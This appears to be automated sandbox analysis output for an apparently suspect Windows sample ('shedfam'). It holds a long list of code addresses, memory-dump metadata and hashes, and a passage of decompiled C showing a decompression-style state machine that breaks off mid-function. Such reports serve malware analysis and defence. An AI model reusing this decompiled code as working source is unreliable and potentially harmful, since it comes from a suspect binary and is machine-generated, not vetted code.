                                                                  0x00406ab3
                                                                  0x00406ab6
                                                                  0x00406ab9
                                                                  0x00406abc
                                                                  0x00406ac2
                                                                  0x00406adb
                                                                  0x00406ade
                                                                  0x00406aea
                                                                  0x00406aeb
                                                                  0x00406aee
                                                                  0x00406ac4
                                                                  0x00406ac4
                                                                  0x00406ad3
                                                                  0x00406ad6
                                                                  0x00406ad6
                                                                  0x00406af8
                                                                  0x00406a98
                                                                  0x00406a98
                                                                  0x00406a98
                                                                  0x00406a9b
                                                                  0x00406a9f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406afa
                                                                  0x00406afa
                                                                  0x00406a73
                                                                  0x00406a77
                                                                  0x00406baf
                                                                  0x00406baf
                                                                  0x00406bb9
                                                                  0x00406bc1
                                                                  0x00406bc8
                                                                  0x00406bca
                                                                  0x00406bd1
                                                                  0x00406bd5
                                                                  0x00406bd5
                                                                  0x00406a7d
                                                                  0x00406a83
                                                                  0x00406a8a
                                                                  0x00406a92
                                                                  0x00406a92
                                                                  0x00406a95
                                                                  0x00000000
                                                                  0x00406a95
                                                                  0x00406aff
                                                                  0x00406b0c
                                                                  0x00406b0f
                                                                  0x00406a1b
                                                                  0x00406a1b
                                                                  0x00406a1b
                                                                  0x004061b7
                                                                  0x004061b7
                                                                  0x004061b7
                                                                  0x004061c0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061c6
                                                                  0x004061c6
                                                                  0x00000000
                                                                  0x004061cd
                                                                  0x004061d1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061d7
                                                                  0x004061da
                                                                  0x004061dd
                                                                  0x004061e0
                                                                  0x004061e4
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061ea
                                                                  0x004061ea
                                                                  0x004061ed
                                                                  0x004061ef
                                                                  0x004061f0
                                                                  0x004061f3
                                                                  0x004061f5
                                                                  0x004061f6
                                                                  0x004061f8
                                                                  0x004061fb
                                                                  0x00406200
                                                                  0x00406205
                                                                  0x0040620e
                                                                  0x00406221
                                                                  0x00406224
                                                                  0x00406230
                                                                  0x00406258
                                                                  0x0040625a
                                                                  0x00406268
                                                                  0x00406268
                                                                  0x0040626c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040625c
                                                                  0x0040625c
                                                                  0x0040625f
                                                                  0x00406260
                                                                  0x00406260
                                                                  0x00000000
                                                                  0x0040625c
                                                                  0x00406232
                                                                  0x00406236
                                                                  0x0040623b
                                                                  0x0040623b
                                                                  0x00406244
                                                                  0x0040624c
                                                                  0x0040624f
                                                                  0x00000000
                                                                  0x00406255
                                                                  0x00406255
                                                                  0x00000000
                                                                  0x00406255
                                                                  0x00000000
                                                                  0x00406272
                                                                  0x00406272
                                                                  0x00406276
                                                                  0x00406b22
                                                                  0x00406b22
                                                                  0x00000000
                                                                  0x00406b22
                                                                  0x0040627c
                                                                  0x0040627f
                                                                  0x0040628f
                                                                  0x00406292
                                                                  0x00406295
                                                                  0x00406295
                                                                  0x00406295
                                                                  0x00406298
                                                                  0x0040629c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040629e
                                                                  0x0040629e
                                                                  0x004062a4
                                                                  0x004062ce
                                                                  0x004062d4
                                                                  0x004062db
                                                                  0x00000000
                                                                  0x004062db
                                                                  0x004062a6
                                                                  0x004062aa
                                                                  0x004062ad
                                                                  0x004062b2
                                                                  0x004062b2
                                                                  0x004062bd
                                                                  0x004062c5
                                                                  0x004062c8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040630d
                                                                  0x00406313
                                                                  0x00406316
                                                                  0x00406323
                                                                  0x0040632b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004062e2
                                                                  0x004062e2
                                                                  0x004062e6
                                                                  0x00406b31
                                                                  0x00406b31
                                                                  0x00000000
                                                                  0x00406b31
                                                                  0x004062ec
                                                                  0x004062f2
                                                                  0x004062fd
                                                                  0x004062fd
                                                                  0x004062fd
                                                                  0x00406300
                                                                  0x00406303
                                                                  0x00406306
                                                                  0x0040630b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004069a2
                                                                  0x004069a2
                                                                  0x004069a8
                                                                  0x004069ae
                                                                  0x004069b4
                                                                  0x004069ce
                                                                  0x004069d1
                                                                  0x004069d7
                                                                  0x004069e2
                                                                  0x004069e2
                                                                  0x004069e4
                                                                  0x004069b6
                                                                  0x004069b6
                                                                  0x004069c5
                                                                  0x004069c9
                                                                  0x004069c9
                                                                  0x004069ee
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004069f0
                                                                  0x004069f4
                                                                  0x00406ba3
                                                                  0x00406ba3
                                                                  0x00000000
                                                                  0x00406ba3
                                                                  0x004069fa
                                                                  0x00406a00
                                                                  0x00406a07
                                                                  0x00406a0f
                                                                  0x00406a12
                                                                  0x00406a15
                                                                  0x00406a15
                                                                  0x00406a1b
                                                                  0x00406a1b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406333
                                                                  0x00406333
                                                                  0x00406335
                                                                  0x00406338
                                                                  0x004063a9
                                                                  0x004063a9
                                                                  0x004063ac
                                                                  0x004063af
                                                                  0x004063b6
                                                                  0x004063c0
                                                                  0x00000000
                                                                  0x004063c0
                                                                  0x0040633a
                                                                  0x0040633a
                                                                  0x0040633e
                                                                  0x00406341
                                                                  0x00406343
                                                                  0x00406346
                                                                  0x00406349
                                                                  0x0040634b
                                                                  0x0040634e
                                                                  0x00406350
                                                                  0x00406355
                                                                  0x00406358
                                                                  0x0040635b
                                                                  0x0040635f
                                                                  0x00406366
                                                                  0x00406369
                                                                  0x00406370
                                                                  0x00406374
                                                                  0x0040637c
                                                                  0x0040637c
                                                                  0x0040637c
                                                                  0x00406376
                                                                  0x00406376
                                                                  0x00406376
                                                                  0x0040636b
                                                                  0x0040636b
                                                                  0x0040636b
                                                                  0x00406380
                                                                  0x00406383
                                                                  0x004063a1
                                                                  0x004063a1
                                                                  0x004063a3
                                                                  0x00000000
                                                                  0x00406385
                                                                  0x00406385
                                                                  0x00406385
                                                                  0x00406388
                                                                  0x0040638b
                                                                  0x0040638e
                                                                  0x00406390
                                                                  0x00406390
                                                                  0x00406390
                                                                  0x00406393
                                                                  0x00406396
                                                                  0x00406398
                                                                  0x00406399
                                                                  0x0040639c
                                                                  0x00000000
                                                                  0x0040639c
                                                                  0x00000000
                                                                  0x004065d2
                                                                  0x004065d2
                                                                  0x004065d6
                                                                  0x004065f4
                                                                  0x004065f4
                                                                  0x004065f7
                                                                  0x004065fe
                                                                  0x00406601
                                                                  0x00406604
                                                                  0x00406607
                                                                  0x0040660a
                                                                  0x0040660d
                                                                  0x0040660f
                                                                  0x00406616
                                                                  0x00406617
                                                                  0x00406619
                                                                  0x0040661c
                                                                  0x0040661f
                                                                  0x00406622
                                                                  0x00406622
                                                                  0x00406627
                                                                  0x00000000
                                                                  0x00406627
                                                                  0x004065d8
                                                                  0x004065d8
                                                                  0x004065db
                                                                  0x004065de
                                                                  0x004065e8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040663c
                                                                  0x0040663c
                                                                  0x00406640
                                                                  0x00406663
                                                                  0x00406666
                                                                  0x00406669
                                                                  0x00406673
                                                                  0x00406642
                                                                  0x00406642
                                                                  0x00406645
                                                                  0x00406648
                                                                  0x0040664b
                                                                  0x00406658
                                                                  0x0040665b
                                                                  0x0040665b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040667f
                                                                  0x0040667f
                                                                  0x00406683
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406689
                                                                  0x00406689
                                                                  0x0040668d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406693
                                                                  0x00406693
                                                                  0x00406695
                                                                  0x00406699
                                                                  0x00406699
                                                                  0x0040669c
                                                                  0x004066a0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004066f0
                                                                  0x004066f0
                                                                  0x004066f4
                                                                  0x004066fb
                                                                  0x004066fb
                                                                  0x004066fe
                                                                  0x00406701
                                                                  0x0040670b
                                                                  0x00000000
                                                                  0x0040670b
                                                                  0x004066f6
                                                                  0x004066f6
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406717
                                                                  0x00406717
                                                                  0x0040671b
                                                                  0x00406722
                                                                  0x00406725
                                                                  0x00406728
                                                                  0x0040671d
                                                                  0x0040671d
                                                                  0x0040671d
                                                                  0x0040672b
                                                                  0x0040672e
                                                                  0x00406731
                                                                  0x00406731
                                                                  0x00406734
                                                                  0x00406737
                                                                  0x0040673a
                                                                  0x0040673a
                                                                  0x0040673d
                                                                  0x00406744
                                                                  0x00406749
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004067d7
                                                                  0x004067d7
                                                                  0x004067db
                                                                  0x00406b79
                                                                  0x00406b79
                                                                  0x00000000
                                                                  0x00406b79
                                                                  0x004067e1
                                                                  0x004067e1
                                                                  0x004067e4
                                                                  0x004067e7
                                                                  0x004067eb
                                                                  0x004067ee
                                                                  0x004067f4
                                                                  0x004067f6
                                                                  0x004067f6
                                                                  0x004067f6
                                                                  0x004067f9
                                                                  0x004067fc
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004063cc
                                                                  0x004063cc
                                                                  0x004063d0
                                                                  0x00406b3d
                                                                  0x00406b3d
                                                                  0x00000000
                                                                  0x00406b3d
                                                                  0x004063d6
                                                                  0x004063d6
                                                                  0x004063d9
                                                                  0x004063dc
                                                                  0x004063e0
                                                                  0x004063e3
                                                                  0x004063e9
                                                                  0x004063eb
                                                                  0x004063eb
                                                                  0x004063eb
                                                                  0x004063ee
                                                                  0x004063f1
                                                                  0x004063f1
                                                                  0x004063f4
                                                                  0x004063f7
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004063fd
                                                                  0x004063fd
                                                                  0x00406403
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406409
                                                                  0x00406409
                                                                  0x0040640d
                                                                  0x00406410
                                                                  0x00406413
                                                                  0x00406416
                                                                  0x00406419
                                                                  0x0040641a
                                                                  0x0040641d
                                                                  0x0040641f
                                                                  0x00406425
                                                                  0x00406428
                                                                  0x0040642b
                                                                  0x0040642e
                                                                  0x00406431
                                                                  0x00406434
                                                                  0x00406437
                                                                  0x00406453
                                                                  0x00406456
                                                                  0x00406459
                                                                  0x0040645c
                                                                  0x00406463
                                                                  0x00406467
                                                                  0x00406469
                                                                  0x0040646d
                                                                  0x00406439
                                                                  0x00406439
                                                                  0x0040643d
                                                                  0x00406445
                                                                  0x0040644a
                                                                  0x0040644c
                                                                  0x0040644e
                                                                  0x0040644e
                                                                  0x00406470
                                                                  0x00406477
                                                                  0x0040647a
                                                                  0x00000000
                                                                  0x00406480
                                                                  0x00406480
                                                                  0x00000000
                                                                  0x00406480
                                                                  0x00000000
                                                                  0x00406485
                                                                  0x00406485
                                                                  0x00406489
                                                                  0x00406b49
                                                                  0x00406b49
                                                                  0x00000000
                                                                  0x00406b49
                                                                  0x0040648f
                                                                  0x0040648f
                                                                  0x00406492
                                                                  0x00406495
                                                                  0x00406499
                                                                  0x0040649c
                                                                  0x004064a2
                                                                  0x004064a4
                                                                  0x004064a4
                                                                  0x004064a4
                                                                  0x004064a7
                                                                  0x004064aa
                                                                  0x004064aa
                                                                  0x004064aa
                                                                  0x004064b0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004064b2
                                                                  0x004064b2
                                                                  0x004064b5
                                                                  0x004064b8
                                                                  0x004064bb
                                                                  0x004064be
                                                                  0x004064c1
                                                                  0x004064c4
                                                                  0x004064c7
                                                                  0x004064ca
                                                                  0x004064cd
                                                                  0x004064d0
                                                                  0x004064e8
                                                                  0x004064eb
                                                                  0x004064ee
                                                                  0x004064f1
                                                                  0x004064f1
                                                                  0x004064f4
                                                                  0x004064f8
                                                                  0x004064fa
                                                                  0x004064d2
                                                                  0x004064d2
                                                                  0x004064da
                                                                  0x004064df
                                                                  0x004064e1
                                                                  0x004064e3
                                                                  0x004064e3
                                                                  0x004064fd
                                                                  0x00406504
                                                                  0x00406507
                                                                  0x00000000
                                                                  0x00406509
                                                                  0x00406509
                                                                  0x00000000
                                                                  0x00406509
                                                                  0x00406507
                                                                  0x0040650e
                                                                  0x0040650e
                                                                  0x0040650e
                                                                  0x0040650e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406549
                                                                  0x00406549
                                                                  0x0040654d
                                                                  0x00406b55
                                                                  0x00406b55
                                                                  0x00000000
                                                                  0x00406b55
                                                                  0x00406553
                                                                  0x00406553
                                                                  0x00406556
                                                                  0x00406559
                                                                  0x0040655d
                                                                  0x00406560
                                                                  0x00406566
                                                                  0x00406568
                                                                  0x00406568
                                                                  0x00406568
                                                                  0x0040656b
                                                                  0x0040656e
                                                                  0x0040656e
                                                                  0x00406574
                                                                  0x00406512
                                                                  0x00406512
                                                                  0x00406515
                                                                  0x00000000
                                                                  0x00406515
                                                                  0x00406576
                                                                  0x00406576
                                                                  0x00406579
                                                                  0x0040657c
                                                                  0x0040657f
                                                                  0x00406582
                                                                  0x00406585
                                                                  0x00406588
                                                                  0x0040658b
                                                                  0x0040658e
                                                                  0x00406591
                                                                  0x00406594
                                                                  0x004065ac
                                                                  0x004065af
                                                                  0x004065b2
                                                                  0x004065b5
                                                                  0x004065b5
                                                                  0x004065b8
                                                                  0x004065bc
                                                                  0x004065be
                                                                  0x00406596
                                                                  0x00406596
                                                                  0x0040659e
                                                                  0x004065a3
                                                                  0x004065a5
                                                                  0x004065a7
                                                                  0x004065a7
                                                                  0x004065c1
                                                                  0x004065c8
                                                                  0x004065cb
                                                                  0x00000000
                                                                  0x004065cd
                                                                  0x004065cd
                                                                  0x00000000
                                                                  0x004065cd
                                                                  0x00000000
                                                                  0x0040685a
                                                                  0x0040685a
                                                                  0x0040685e
                                                                  0x00406b85
                                                                  0x00406b85
                                                                  0x00000000
                                                                  0x00406b85
                                                                  0x00406864
                                                                  0x00406864
                                                                  0x00406867
                                                                  0x0040686a
                                                                  0x0040686e
                                                                  0x00406871
                                                                  0x00406877
                                                                  0x00406879
                                                                  0x00406879
                                                                  0x00406879
                                                                  0x0040687c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040662a
                                                                  0x0040662a
                                                                  0x0040662d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406969
                                                                  0x00406969
                                                                  0x0040696d
                                                                  0x0040698f
                                                                  0x0040698f
                                                                  0x00406992
                                                                  0x0040699c
                                                                  0x0040699f
                                                                  0x0040699f
                                                                  0x00000000
                                                                  0x0040699f
                                                                  0x0040696f
                                                                  0x0040696f
                                                                  0x00406972
                                                                  0x00406976
                                                                  0x00406979
                                                                  0x00406979
                                                                  0x0040697c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406a26
                                                                  0x00406a26
                                                                  0x00406a2a
                                                                  0x00406a48
                                                                  0x00406a48
                                                                  0x00406a48
                                                                  0x00406a48
                                                                  0x00406a4f
                                                                  0x00406a56
                                                                  0x00406a5d
                                                                  0x00406a5d
                                                                  0x00406a64
                                                                  0x00406a67
                                                                  0x00406a6e
                                                                  0x00000000
                                                                  0x00406a71
                                                                  0x00406a2c
                                                                  0x00406a2c
                                                                  0x00406a2f
                                                                  0x00406a32
                                                                  0x00406a35
                                                                  0x00406a3c
                                                                  0x00406980
                                                                  0x00406980
                                                                  0x00406983
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406b17
                                                                  0x00406b17
                                                                  0x00406b1a
                                                                  0x00406a1b
                                                                  0x00406a1b
                                                                  0x00406a1b
                                                                  0x00000000
                                                                  0x00406a21
                                                                  0x00000000
                                                                  0x00406751
                                                                  0x00406751
                                                                  0x00406753
                                                                  0x0040675a
                                                                  0x0040675b
                                                                  0x0040675d
                                                                  0x00406760
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406a64
                                                                  0x00406a64
                                                                  0x00406a67
                                                                  0x00406a6e
                                                                  0x00000000
                                                                  0x00406a71
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406796
                                                                  0x00406796
                                                                  0x00406799
                                                                  0x004067cf
                                                                  0x004067cf
                                                                  0x004068ff
                                                                  0x004068ff
                                                                  0x004068ff
                                                                  0x004068ff
                                                                  0x00406902
                                                                  0x00406902
                                                                  0x00406905
                                                                  0x00406907
                                                                  0x00406b91
                                                                  0x00406b91
                                                                  0x00000000
                                                                  0x00406b91
                                                                  0x0040690d
                                                                  0x0040690d
                                                                  0x00406910
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406916
                                                                  0x00406916
                                                                  0x0040691a
                                                                  0x0040691d
                                                                  0x0040691d
                                                                  0x0040691d
                                                                  0x00000000
                                                                  0x0040691d
                                                                  0x0040679b
                                                                  0x0040679b
                                                                  0x0040679d
                                                                  0x0040679f
                                                                  0x004067a1
                                                                  0x004067a4
                                                                  0x004067a5
                                                                  0x004067a7
                                                                  0x004067a9
                                                                  0x004067ac
                                                                  0x004067af
                                                                  0x004067c5
                                                                  0x004067c5
                                                                  0x004067ca
                                                                  0x00406802
                                                                  0x00406802
                                                                  0x00406806
                                                                  0x0040682f
                                                                  0x00406832
                                                                  0x00406834
                                                                  0x0040683b
                                                                  0x0040683e
                                                                  0x00406841
                                                                  0x00406841
                                                                  0x00406846
                                                                  0x00406846
                                                                  0x00406848
                                                                  0x0040684b
                                                                  0x00406852
                                                                  0x00406855
                                                                  0x00406882
                                                                  0x00406882
                                                                  0x00406885
                                                                  0x00406888
                                                                  0x004068fc
                                                                  0x004068fc
                                                                  0x004068fc
                                                                  0x004068fc
                                                                  0x00000000
                                                                  0x004068fc
                                                                  0x0040688a
                                                                  0x0040688a
                                                                  0x00406890
                                                                  0x00406893
                                                                  0x00406896
                                                                  0x00406899
                                                                  0x0040689c
                                                                  0x0040689f
                                                                  0x004068a2
                                                                  0x004068a5
                                                                  0x004068a8
                                                                  0x004068ab
                                                                  0x004068c4
                                                                  0x004068c6
                                                                  0x004068c9
                                                                  0x004068ca
                                                                  0x004068cd
                                                                  0x004068cf
                                                                  0x004068d2
                                                                  0x004068d4
                                                                  0x004068d6
                                                                  0x004068d9
                                                                  0x004068db
                                                                  0x004068de
                                                                  0x004068e2
                                                                  0x004068e4
                                                                  0x004068e4
                                                                  0x004068e5
                                                                  0x004068e8
                                                                  0x004068eb
                                                                  0x004068ad
                                                                  0x004068ad
                                                                  0x004068b5
                                                                  0x004068ba
                                                                  0x004068bc
                                                                  0x004068bf
                                                                  0x004068bf
                                                                  0x004068ee
                                                                  0x004068f5
                                                                  0x0040687f
                                                                  0x0040687f
                                                                  0x0040687f
                                                                  0x0040687f
                                                                  0x00000000
                                                                  0x004068f7
                                                                  0x004068f7
                                                                  0x00000000
                                                                  0x004068f7
                                                                  0x004068f5
                                                                  0x00406808
                                                                  0x00406808
                                                                  0x0040680b
                                                                  0x0040680d
                                                                  0x00406810
                                                                  0x00406813
                                                                  0x00406816
                                                                  0x00406818
                                                                  0x0040681b
                                                                  0x0040681e
                                                                  0x0040681e
                                                                  0x00406821
                                                                  0x00406821
                                                                  0x00406824
                                                                  0x0040682b
                                                                  0x004067ff
                                                                  0x004067ff
                                                                  0x004067ff
                                                                  0x004067ff
                                                                  0x00000000
                                                                  0x0040682d
                                                                  0x0040682d
                                                                  0x00000000
                                                                  0x0040682d
                                                                  0x0040682b
                                                                  0x004067b1
                                                                  0x004067b1
                                                                  0x004067b4
                                                                  0x004067b6
                                                                  0x004067b9
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406518
                                                                  0x00406518
                                                                  0x0040651c
                                                                  0x00406b61
                                                                  0x00406b61
                                                                  0x00000000
                                                                  0x00406b61
                                                                  0x00406522
                                                                  0x00406522
                                                                  0x00406525
                                                                  0x00406528
                                                                  0x0040652b
                                                                  0x0040652e
                                                                  0x00406531
                                                                  0x00406534
                                                                  0x00406536
                                                                  0x00406539
                                                                  0x0040653c
                                                                  0x0040653f
                                                                  0x00406541
                                                                  0x00406541
                                                                  0x00406541
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004066a3
                                                                  0x004066a3
                                                                  0x004066a7
                                                                  0x00406b6d
                                                                  0x00406b6d
                                                                  0x00000000
                                                                  0x00406b6d
                                                                  0x004066ad
                                                                  0x004066ad
                                                                  0x004066b0
                                                                  0x004066b3
                                                                  0x004066b6
                                                                  0x004066b8
                                                                  0x004066b8
                                                                  0x004066b8
                                                                  0x004066bb
                                                                  0x004066be
                                                                  0x004066c1
                                                                  0x004066c4
                                                                  0x004066c7
                                                                  0x004066ca
                                                                  0x004066cb
                                                                  0x004066cd
                                                                  0x004066cd
                                                                  0x004066cd
                                                                  0x004066d0
                                                                  0x004066d3
                                                                  0x004066d6
                                                                  0x004066d9
                                                                  0x004066d9
                                                                  0x004066d9
                                                                  0x004066dc
                                                                  0x004066de
                                                                  0x004066de
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406920
                                                                  0x00406920
                                                                  0x00406920
                                                                  0x00406924
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040692a
                                                                  0x0040692a
                                                                  0x0040692d
                                                                  0x00406930
                                                                  0x00406933
                                                                  0x00406935
                                                                  0x00406935
                                                                  0x00406935
                                                                  0x00406938
                                                                  0x0040693b
                                                                  0x0040693e
                                                                  0x00406941
                                                                  0x00406944
                                                                  0x00406947
                                                                  0x00406948
                                                                  0x0040694a
                                                                  0x0040694a
                                                                  0x0040694a
                                                                  0x0040694d
                                                                  0x00406950
                                                                  0x00406953
                                                                  0x00406956
                                                                  0x00406959
                                                                  0x0040695d
                                                                  0x0040695f
                                                                  0x00406962
                                                                  0x00000000
                                                                  0x00406964
                                                                  0x00406964
                                                                  0x004066e1
                                                                  0x004066e1
                                                                  0x00000000
                                                                  0x004066e1
                                                                  0x00406962
                                                                  0x00406b97
                                                                  0x00406b97
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061c6
                                                                  0x00406bce
                                                                  0x00406bce
                                                                  0x00000000
                                                                  0x00406bce
                                                                  0x00406a1b
                                                                  0x00406a9b
                                                                  0x00406a64

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9f777e2b5f047ff5fac18a6b7d4eccb0398312e185884248bc8ff9efca1ede3f
                                                                  • Instruction ID: 0a364959098a1219693739684ad0890dad76377db1f96b1360ce1028e8ac0eba
                                                                  • Opcode Fuzzy Hash: 9f777e2b5f047ff5fac18a6b7d4eccb0398312e185884248bc8ff9efca1ede3f
                                                                  • Instruction Fuzzy Hash: 7EA15371E00229CBDF28DFA8C8447ADBBB1FB45305F11816ED816BB281C7786A96DF44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 98%
                                                                  			E00406969() {
                                                                  				void _t533;
                                                                  				signed int _t534;
                                                                  				signed int _t535;
                                                                  				signed int* _t605;
                                                                  				void* _t612;
                                                                  
                                                                  				L0:
                                                                  				while(1) {
                                                                  					L0:
                                                                  					if( *(_t612 - 0x40) != 0) {
                                                                  						 *(_t612 - 0x84) = 0x13;
                                                                  						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                                  						goto L132;
                                                                  					} else {
                                                                  						__eax =  *(__ebp - 0x4c);
                                                                  						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                  						__ecx =  *(__ebp - 0x58);
                                                                  						__eax =  *(__ebp - 0x4c) << 4;
                                                                  						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                  						L130:
                                                                  						 *(__ebp - 0x58) = __eax;
                                                                  						 *(__ebp - 0x40) = 3;
                                                                  						L144:
                                                                  						 *(__ebp - 0x7c) = 0x14;
                                                                  						L145:
                                                                  						__eax =  *(__ebp - 0x40);
                                                                  						 *(__ebp - 0x50) = 1;
                                                                  						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                  						L149:
                                                                  						if( *(__ebp - 0x48) <= 0) {
                                                                  							__ecx =  *(__ebp - 0x40);
                                                                  							__ebx =  *(__ebp - 0x50);
                                                                  							0 = 1;
                                                                  							__eax = 1 << __cl;
                                                                  							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                  							__eax =  *(__ebp - 0x7c);
                                                                  							 *(__ebp - 0x44) = __ebx;
                                                                  							while(1) {
                                                                  								L140:
                                                                  								 *(_t612 - 0x88) = _t533;
                                                                  								while(1) {
                                                                  									L1:
                                                                  									_t534 =  *(_t612 - 0x88);
                                                                  									if(_t534 > 0x1c) {
                                                                  										break;
                                                                  									}
                                                                  									switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
                                                                  										case 0:
                                                                  											if( *(_t612 - 0x6c) == 0) {
                                                                  												goto L170;
                                                                  											}
                                                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                  											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                  											_t534 =  *( *(_t612 - 0x70));
                                                                  											if(_t534 > 0xe1) {
                                                                  												goto L171;
                                                                  											}
                                                                  											_t538 = _t534 & 0x000000ff;
                                                                  											_push(0x2d);
                                                                  											asm("cdq");
                                                                  											_pop(_t569);
                                                                  											_push(9);
                                                                  											_pop(_t570);
                                                                  											_t608 = _t538 / _t569;
                                                                  											_t540 = _t538 % _t569 & 0x000000ff;
                                                                  											asm("cdq");
                                                                  											_t603 = _t540 % _t570 & 0x000000ff;
                                                                  											 *(_t612 - 0x3c) = _t603;
                                                                  											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                                  											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                                  											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                                  											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                                  												L10:
                                                                  												if(_t611 == 0) {
                                                                  													L12:
                                                                  													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                                  													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                  													goto L15;
                                                                  												} else {
                                                                  													goto L11;
                                                                  												}
                                                                  												do {
                                                                  													L11:
                                                                  													_t611 = _t611 - 1;
                                                                  													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                                  												} while (_t611 != 0);
                                                                  												goto L12;
                                                                  											}
                                                                  											if( *(_t612 - 4) != 0) {
                                                                  												GlobalFree( *(_t612 - 4));
                                                                  											}
                                                                  											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                  											 *(_t612 - 4) = _t534;
                                                                  											if(_t534 == 0) {
                                                                  												goto L171;
                                                                  											} else {
                                                                  												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                                  												goto L10;
                                                                  											}
                                                                  										case 1:
                                                                  											L13:
                                                                  											__eflags =  *(_t612 - 0x6c);
                                                                  											if( *(_t612 - 0x6c) == 0) {
                                                                  												 *(_t612 - 0x88) = 1;
                                                                  												goto L170;
                                                                  											}
                                                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                  											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                                  											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                  											_t45 = _t612 - 0x48;
                                                                  											 *_t45 =  *(_t612 - 0x48) + 1;
                                                                  											__eflags =  *_t45;
                                                                  											L15:
                                                                  											if( *(_t612 - 0x48) < 4) {
                                                                  												goto L13;
                                                                  											}
                                                                  											_t546 =  *(_t612 - 0x40);
                                                                  											if(_t546 ==  *(_t612 - 0x74)) {
                                                                  												L20:
                                                                  												 *(_t612 - 0x48) = 5;
                                                                  												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                                  												goto L23;
                                                                  											}
                                                                  											 *(_t612 - 0x74) = _t546;
                                                                  											if( *(_t612 - 8) != 0) {
                                                                  												GlobalFree( *(_t612 - 8));
                                                                  											}
                                                                  											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                                  											 *(_t612 - 8) = _t534;
                                                                  											if(_t534 == 0) {
                                                                  												goto L171;
                                                                  											} else {
                                                                  												goto L20;
                                                                  											}
                                                                  										case 2:
                                                                  											L24:
